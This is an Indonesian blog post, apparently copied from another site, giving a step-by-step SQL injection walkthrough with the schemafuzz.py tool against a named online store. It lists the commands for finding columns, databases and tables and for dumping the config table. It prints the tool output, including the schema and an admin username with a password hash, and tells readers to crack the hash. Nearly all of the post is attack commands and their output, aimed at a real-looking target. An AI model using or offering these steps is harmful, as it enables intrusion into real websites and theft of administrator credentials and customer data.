bedah web...

• Flash (3)
• Handphone (2)
• Lain-lain (3)
• Pemrograman (7)
• Software (1)
• Teknologi (5)
• Web (0)

capture gambar delphi (408)

perpustakaan (276)

Windows 7 Gantikan Windows Vista (273)

Memperkecil Kelemahan Program (249)

Program Test Resolusi (231)

rendy pada capture gambar delphi

h3n pada Mengubah Flashdisk 1 Giga Menjadi 2 Giga

tsani pada Mengubah Flashdisk 1 Giga Menjadi 2 Giga

Hasan pada Mengubah Flashdisk 1 Giga Menjadi 2 Giga

El_Khowary pada Mengubah Flashdisk 1 Giga Menjadi 2 Giga

August 2010 (2)

July 2010 (1)

June 2010 (1)

April 2010 (5)

March 2010 (5)

February 2010 (4)

October 2009 (1)

January 2009 (2)

flash animation

web resource

Kamis, 08 April 2010 - 22:14:25 WIB
bedah web...
Diposting oleh : eko wahyudi s
Kategori: Lain-lain - Dibaca: 99 kali

Source d1gdo dot com

Bahan-bahan yg harus disiapkan :
1.Python , donlot di sini
2.Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py
3.CMD

Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u "target" --perintah
Utk lebih jelasnya,,langsung ke TKP ,, wkwkwkwk

1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2.Cek columnnya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol

maka akan keluar :

+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
+] Evasion Used: "+" "--"
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns...
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SEL CT+0,1,2,3,4,5,6--
+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION SELECT+darkc0de,1,2,3,4,5,6
-] Done!

Nah kita gunakan ini
http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6 utk nginject.

3.Cari db nya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --dbs

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net This e-mail address is being protected from spambots. You need JavaScript enabled to view it
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] ??sleeppo_store?
[-] 09:57:00
[-] Total URL Requests 3
[-] Done

Tuh kan keliatan db nya,,wkwkwkkw sleeppo_store

4.Cari nama tabel dalam db
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net This e-mail address is being protected from spambots. You need JavaScript enabled to view it
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20
[Database]: sleeppo_store
[Table: Columns]
[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate ,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s urvey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done

Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit

5.Exploit tabel n kolom
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net This e-mail address is being protected from spambots. You need JavaScript enabled to view it
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data
[-] 10:37:36
[-] Total URL Requests 5
[-] Done

xixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aja

Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom

ex :
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --fuzz

Beberapa perintah :
--fuzz >>> mencari nama kolom n tabel pada sql v 4
--schema >>> melihat nama tabel
--dump >>> melihat isi kolom
--findcol >>> menemukan dakc0de ( colom )

Silahkan cari yg laen.Baca aja help nya.